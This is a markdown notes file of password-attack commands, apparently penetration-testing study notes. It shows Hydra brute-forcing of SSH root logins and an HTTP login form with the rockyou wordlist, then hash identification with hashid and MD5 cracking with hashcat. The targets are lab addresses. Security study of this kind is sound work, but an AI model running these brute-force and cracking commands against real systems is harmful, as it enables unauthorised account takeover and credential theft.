Anonymvs17/hacking/notes/web/passwdBruteforcing.md

 //using username “root” with a password list on ssh with 4 parallel tasks and verbose `hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.0.13:22 -t 4 -V`
 or: `hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1`

+## HTTP POST Attack with THC-Hydra
+As an additional example, we will perform an HTTP POST attack against our Windows Apache server using Hydra.
+When a HTTP POST request is used for user login, it is most often through the use of a web form, which means we should use the “http-form-post” service module `hydra http-form-post -U`

+The complete command can now be executed.
+We will supply the admin user name ( `-l admin` ) and wordlist ( `-P` ), request verbose output with `-vV` , and use `-f` to stop the attack when the first successful result is found.
+In addition, we will supply the service module name ( `http-form-post` ) and its required arguments ( `“/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN”` ) `hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f`

+# Hashes

+## Identifying hashes
+`hashid c43ee559d69bc7f691fe2fbfe8a5ef0a`
+Generates:
+Analyzing 'c43ee559d69bc7f691fe2fbfe8a5ef0a'
+[+] MD2

+## Decrypt hashes

+Example: cracking md5 (0 => md5) -a attackmode
+`hashcat -m 0 -a 0 "5f4dcc3b5aa765d61d8327deb882cf99"`

+OR add `--force` run with CPU instead of GPU; 0 => md5 `hashcat -m 0 md5hash.txt /home/kali/Documents/rockyou.txt --force`